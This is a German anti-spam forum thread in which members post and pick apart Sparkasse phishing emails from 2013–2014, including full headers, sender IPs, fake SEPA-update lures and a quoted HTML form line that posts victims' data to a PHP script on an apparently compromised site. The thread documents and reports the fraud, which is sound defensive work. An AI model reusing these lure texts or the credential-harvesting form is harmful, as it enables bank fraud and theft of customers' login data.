Sparkasse (schon wieder)

[carsten.gentsch]

Dito, bei mir heute auch die selbe Email, ich werde morgen die Damen und Herren der Netzwerktechnik mal anrufen und fragen wer den Ihre Server vetreut über die gespammt wird. Langsam solle es Firmen mal Geld kosten wenn sowas passiert, mal ist ja ok niemand ist 100% sicher. Aber das geht ja schon ein paar Tage so.
Schauen wir mal was dabei rauskommt.

MFG

[cmds]

Es hat einmal wieder das Antispam Ticket System erwischt

header:

01: From sparkasse.de [at] flyata.co.uk  Sun Dec  8 xx:xx:xx 2013
02: Return-Path: <sparkasse.de [at] flyata.co.uk>
03: X-Original-To: ...... [at] antispam-ev.de
04: Delivered-To: ....... [at] antispam-ev.de
05: Received: from smtp3.enta.net (unknown [195.74.113.201]) by antispam-ev.de
06: 	(Postfix) with ESMTP ID: [ID filtered]
07: Received: from flyata.co.uk (78-33-151-183.static.enta.net [78.33.151.183]) by
08: 	smtp3.enta.net (Postfix) with ESMTP ID: [ID filtered]
09: Received: from User ([78.33.148.242]) by flyata.co.uk with Microsoft
10: 	SMTPSVC(6.0.3790.4675);  Sun, 8 Dec 2013 xx:xx:xx +0000
11: Reply-To: <noreply [at] sparkasse.de>
12: From: "Sparkasse De"<sparkasse.de [at] flyata.co.uk>
13: Subject: technische Störung
14: Date: Sun, 8 Dec 2013 xx:xx:xx -0000

Sehr geehrter Kunde,

Als vorbeugende Maßnahme alle unsere Kunden sind erforderlich, um Bankkonto zu
aktualisieren. Bitte durch diesen Link gehen, um die Aktualisierung selbst zu
tun.

Sparkasse Bank sicherzustellen, dass System-Verifikation sorgen jeden Monat,
um bessere Dienstleistungen für unsere Kunden valable bereit zustellen.

[1]http://sparkasse.de/online/updates

Nachdem Update wird einer unserer Mitarbeiter Sie kontaktieren, um den
gesamten Prozess zu vervollstandigen. Wenn der Vorgang abgeschlossen ist,
werden Sie wie gewohnt ihr online-Banking mit der Sparkasse verwenden können.

Wir wollen Ihnen im Voraus für Ihre Mitarbeit danken.

SPARKASSE
Mit freundlichen Grüßen,
Sparkasse.



[1] ^whois: [Link nur für registrierte Mitglieder sichtbar. ]

gehostet bei dem aufsteigenden Stern am Schwarzhuthimmel: Hetzner

[schara56]

header:

01: Received: from smtp-out036-sv1.telkom.net (smtp-out036-sv1.telkom.net
02: 	[118.98.80.36])
03: 	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
04: 	(No client certificate requested)
05: 	by x (Postfix) with ESMTPS ID: [ID filtered]
06: 	for <x>; Wed,  8 Jan 2014 xx:xx:xx +0100 (CET)
07: Received: from [222.124.18.76] (helo=fm1.smtp.telkom.net)
08: 	by smtp-out036-sv1.telkom.net. with esmtps (TLSv1:AES256-SHA:256)
09: 	ID: [ID filtered]
10: Received: from mail5.sucofindo-laboratory.co.ID: [ID filtered]
11: 	by fm1.smtp.telkom.net  with ESMTP ID: [ID filtered]
12: 	Wed, 8 Jan 2014 xx:xx:xx +0700
13: Received: from localhost (localhost [127.0.0.1])
14: 	by mail5.sucofindo-laboratory.co.ID: [ID filtered]
15: 	Wed,  8 Jan 2014 xx:xx:xx +0700 (WIT)
16: X-Virus-Scanned: amavisd-new at sucofindo-laboratory.co.id
17: Received: from mail5.sucofindo-laboratory.co.ID: [ID filtered]
18: 	by localhost (mail5.sucofindo-laboratory.co.ID: [ID filtered]
19: 	with ESMTP ID: [ID filtered]
20: Received: from [109.34.139.204] (unknown [109.34.139.204])
21: 	by mail5.sucofindo-laboratory.co.ID: [ID filtered]
22: 	Wed,  8 Jan 2014 xx:xx:xx +0700 (WIT)

Gephished wird hier: ^whois: [Link nur für registrierte Mitglieder sichtbar. ]/www.sparkasse.at/sepa-umstellung.htm
Hosenlatz offen: ^whois: [Link nur für registrierte Mitglieder sichtbar. ]/www.sparkasse.at/ -> ^whois: [Link nur für registrierte Mitglieder sichtbar. ]/www.sparkasse.at/data.txt

Sparkassen AG (Erste Bank)
Graben 21.
A-1010, Wien
08-01-2014


Sehr geehrter Kunde,

Wie Ihnen wahrscheinlich bekannt ist, tritt ab 01.Februar 2014 das neue SEPA-Zahlungssystem in Kraft. SEPA (Single Euro Payments Area) ist das neue vereinheitlichte Zahlungssystem, das europaweit gilt. Mit dem neuen SEPA-System werden Überweisungen nicht nur schneller und zuverlässiger, der Zahlungsverkehr wird durch dieses neue System auch sicherer.

Bitte folgen Sie den Anweisungen des untenstehenden Links:

www-sparkasse.at/kundenservise/sepa.abteilung

Nach Vervollständigung dieses Schrittes werden Sie von einem Mitarbeiter unseres Kundendienstes zum Status Ihres Kontos kontaktiert.

Beim Net-Banking haben Sie per Mausklick alles im Griff! Mit dem komfortablen Net-Banking Ihrer Sparkasse Erste haben Sie schnellen und problemlosen Zugang zu Ihrem Girokonto und erledigen Überweisungen und Daueraufträge bequem per Mausklick. Das Net-Banking bietet aber noch viele weitere Vorteile.

DIE VORTEILE DES NET-BANKINGS AUF EINEN BLICK:

- Kontozugang rund um die Uhr
- Schneller Zugriff aufs Girokonto
- Net-Banking bequem vom PC aus
- Flexibel in jedem Winkel der Welt
- Übersichtliche Kontoführung
- Hohe Sicherheitsstandards
- Net-Banking ist kombinierbar mit Telefon-Banking

Um diese Dienste weiterhin problemlos nutzen zu können, führen Sie bitte das Update zur SEPA-Umstellung so schnell wie möglich durch.

Mit freundlichen Grüßen,
Net-Banking-Abteilung
SPARKASSE ERSTEBANK

[carkiller08]

SPARKASSE
BERLINER STRAßE 40-41,
10715 BERLIN
27.01.2014



Sehr geehrter Kunde,

Wie Ihnen wahrscheinlich bekannt ist, tritt ab 01.Februar 2014 das neue SEPA-Zahlungssystem in Kraft. SEPA (Single Euro Payments Area) ist das neue vereinheitlichte Zahlungssystem, das europaweit gilt. Mit dem neuen SEPA-System werden Überweisungen nicht nur schneller und zuverlässiger, der Zahlungsverkehr wird durch dieses neue System auch sicherer.

Bitte folgen Sie den Anweisungen des untenstehenden Links:

www-sparkasse.de/kundenservise/sepa.abteilung
^whois: [Link nur für registrierte Mitglieder sichtbar. ]

Nach Vervollständigung dieses Schrittes werden Sie von einem Mitarbeiter unseres Kundendienstes zum Status Ihres Kontos kontaktiert.

Beim Online-Banking haben Sie per Mausklick alles im Griff! Mit dem komfortablen Online-Banking Ihrer Sparkasse haben Sie schnellen und problemlosen Zugang zu Ihrem Girokonto und erledigen Überweisungen und Daueraufträge bequem per Mausklick. Das Online-Banking bietet aber noch viele weitere Vorteile.

DIE VORTEILE DES ONLINE-BANKINGS AUF EINEN BLICK:

- Kontozugang rund um die Uhr
- Schneller Zugriff aufs Girokonto
- Online-Banking bequem vom PC aus
- Flexibel in jedem Winkel der Welt
- Übersichtliche Kontoführung
- Hohe Sicherheitsstandards
- Online-Banking ist kombinierbar mit Telefon-Banking

Um diese Dienste weiterhin problemlos nutzen zu können, führen Sie bitte das Update zur SEPA-Umstellung so schnell wie möglich durch.

Mit freundlichen Grüßen,
Online-Banking-Abteilung
SPARKASSE

[x]Meldung an S-CERT erfolgt

header:

01: Received: from MMS-IDMX-24.maxindo.net ([122.144.1.62]) by
02: 	SNT0-MC1-F23.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
03: 	 Sun, 26 Jan 2014 xx:xx:xx -0800
04: Received: from mail.maxindo.net (mail.maxindo.net [175.103.44.150])
05: 	by MMS-IDMX-24.maxindo.net (Postfix) with ESMTP ID: [ID filtered]
06: 	Mon, 27 Jan 2014 xx:xx:xx +0700 (WIT)
07: Received: from mail.illigalsclub.com (unknown [119.110.71.58])
08: 	by mail.maxindo.net (Postfix) with ESMTP ID: [ID filtered]
09: 	Mon, 27 Jan 2014 xx:xx:xx +0700 (WIT)
10: Received: from localhost (localhost [127.0.0.1])
11: 	by mail.illigalsclub.com (Postfix) with ESMTP ID: [ID filtered]
12: 	Mon, 27 Jan 2014 xx:xx:xx +0700 (WIT)
13: X-Virus-Scanned: amavisd-new at illigalsclub.com
14: Received: from mail.illigalsclub.com ([127.0.0.1])
15: 	by localhost (mail.illigalsclub.com [127.0.0.1]) (amavisd-new, port 10024)
16: 	with ESMTP ID: [ID filtered]
17: Received: from [109.38.208.149] (unknown [109.38.208.149])
18: 	by mail.illigalsclub.com (Postfix) with ESMTPSA ID: [ID filtered]
19: 	Mon, 27 Jan 2014 xx:xx:xx +0700 (WIT)
20: Content-Type: multipart/alternative; boundary="===============1478913355=="
21: MIME-Version: 1.0
22: Subject: SEPA - UMSTELLUNG/ SICHERHEIT IM ONLINE-BANKING
23: To: Recipients <poor [at] spamvictim.tld>

[kjz1]

Wieder mal mein Phiski-Vlad mit HTML-Anhang und gecracktem Wordpress:

header:

01: Received: from atl-01-023.10types.net ([72.9.236.218]) by mx-ha.gmx.net 
02: 	(mxgmx106) with ESMTPS (Nemesis) ID: [ID filtered]
03: Received: from [115.111.121.202] (port=1076 helo=sparkasse.net) by
04: 	atl-01-023.10types.net with esmtpa (Exim 4.82) (envelope-from <beachten [at] sparkasse.net>)
05: 	ID: [ID filtered]

IP: 115.111.121.202 ---> 115.111.121.202.static-delhi.vsnl.net.in

Sehr geehrter Kunde,

Wir haben ungewöhnliche Aktivitäten in Ihrem Konto festgestellt
1. April 2014.

Sie müssen bestätigen Sie Ihre Kontobewegungen, bevor Sie können
weiterhin die Karte verwenden. Nach der Überprüfung gibt
Entfernen Sie alle Beschränkungen auf Ihrem Konto.

Bitte laden Sie das Formular im Anhang zu dieser E-Mail und
öffnen Sie sie in einem Web-Browser und füllen

************************************************** ************

Vielen Dank für die Nutzung der Sparkasse
Wir schätzen Ihr Geschäft und die Gelegenheit, Ihnen zu dienen.

Mit freundlichen Grüßen,

Sparkasse Bank

© sparkasse.de Jahr 2014. - P. Iva 00348170101 Alle Rechte
vorbehalten. Vervielfältigung Nur mit genehmigung der Sparkassen-
Finanzportal GmbH.

Bestätigen Sie Ihre Daten.html

Im Anhang das Skript:

[HTML]<FORM id="FORM1" onsubmit="return submitIt(this)" method="post"
name="FORM1" action="http://wp.adazambuja.org/www/app/webup/pbs.php">[/HTML]

IP: 81.88.48.97 ---> register.it internet server

[Chactory]

Im Anhang das Skript

Was macht das Skript, kjz1?
Sorgt es dafür, daß derjenige, der das Html-Dokument öffnet, auf eine verseuchte Website umgeleitet wird?

[cmds]

da wird zur Dateneingabe ein gefaktes Formular eingeblendet

[Chactory]

Achso, sie leiten einen nicht mit einem Link um, sondern verstecken den hinter einem scheinbaren Anhang.

[kjz1]

Ja, es handelt sich um ein angehängtes HTML-Formular in das man seine Daten eintragen soll, die dann von besagtem PHP-Skript (liegt auf einem gecrackten Server) ausgewertet und wahrscheinlich an den Vlad weitergemailt werden. Das Opfer wird anschliessend auf die Original-Webseite der Bank weitergeleitet. Egal ob Sparkasse, Postbank, Targo oder Visa, die Masche von Phishki ist immer identisch. Also wohl immer dieselbe Bande, sofern man keinen Phish-Baukasten verwendet.

[Chactory]

Das Opfer wird anschliessend auf die Original-Webseite der Bank weitergeleitet.

Tricky!